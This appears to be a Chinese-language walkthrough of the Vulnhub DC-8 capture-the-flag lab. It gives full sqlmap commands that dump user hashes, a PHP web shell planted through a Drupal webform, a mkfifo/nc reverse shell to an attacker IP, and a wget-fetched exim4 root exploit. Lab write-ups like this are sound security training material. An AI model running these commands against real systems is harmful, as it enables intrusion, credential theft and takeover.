Vulnhub DC-8 – 作者:WAFmax

DC-8

基础信息

整体上思路明确操作简单清晰

图片.png

搭建靶机检测能否运行

图片.png

主机发现与端口扫描

因为靶机与kali处在同一个网段,先对靶机的地址进行确认

nmap 192.168.1.0/24

发现地址为192.168.1.105,对开放端口进行详细探测

nmap -sV -p- -sS -A 192.168.1.105

图片.png

SQL注入

访问80端口查看是否存在可以利用的信息
访问页面发现可能存在SQL注入

图片.png

输入or 1=1 页面正常回显

图片.png

输入and 1=2 页面出现问题

图片.png

直接使用sqlmap爬取账号与密码

sqlmap -u "http://192.168.1.105/?nid=3" --dbs --batch 获取数据库
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' --tables --batch 获取表
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' -T 'users'--columns  --batch 获取users表中的列
sqlmap -u "http://192.168.1.105/?nid=3" -D 'd7db' -T 'users' -C 'name,pass' --dump  --batch
获取字段

图片.png图片.png
图片.png图片.png

获取到账号与密码但是密码是hash加密的需要进行爆破经过尝试只有john的密码成功爆破

vim passwd
john --show passwd  因为之前爆破过一次所以我直接使用show命令查看

图片.png

获取shell

通过dirb 获取靶机目录

dirb http://192.168.1.105/

发现dirb http://192.168.1.105/user是登录界面使用获取的账号进行登录
用户:john
密码:turtle

图片.png

点击上面的Contact,选择Contact Us,后点击Webform -> form settings,选择PHP code,然后填入PHP一句话木马

图片.png

保存之后返回页面提交信息

图片.png

上传成功
图片.png

使用蚁剑进行连接
提示在进行连接前需要把变量去除,若不去除变量无法连接成功
192.168.1.105/node/3/done?
连接成功
图片.png
进入虚拟终端反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.106 1234 >/tmp/f

图片.png

成功反弹shell,获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

使用find命令查看可利用信息

find / -perm -u=s -type f 2>/dev/null

发现exim4可以利用

图片.png

查询版本信息

图片.png

使用searchsploit 查询可利用漏洞

图片.png将该脚本复制到root目录下并重新命名dc8.sh
使用python开启临时端口将脚本下载到靶机中
进行利用

python -m SimpleHTTPServer 8000

在下载之前需要先计入到靶机的/tmp目录下否则下载的脚本没有权限
图片.png通过wget命令下载

wget http://192.168.1.106:8000/dc8.sh

在下载之前需要先计入到靶机的/tmp目录下否则下载的脚本没有权限

图片.png

chmod赋予脚本权限

chmod 777 dc8.sh

查看脚本发现有两条命令可以执行

./dc8.sh -m setuid 
 ./dc8.sh -m netcat

执行命令发现报错信息,存在编码错误需要修改编码方式

图片.png

进入kali查看脚本编码方式

set ff? 查看编码方式
set ff=unix 将编码方式改为unix编码

图片.png

重新下载文件,赋予权限
并执行刚才的命令
./dc8.sh -m setuid 执行之后没有提权到root

图片.png

尝试第二条命令./dc8.sh -m netcat
成功获取root权限

图片.png

进入root目录下查看flag.txt
图片.png

来源:freebuf.com 2021-01-31 13:53:46 by: WAFmax

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论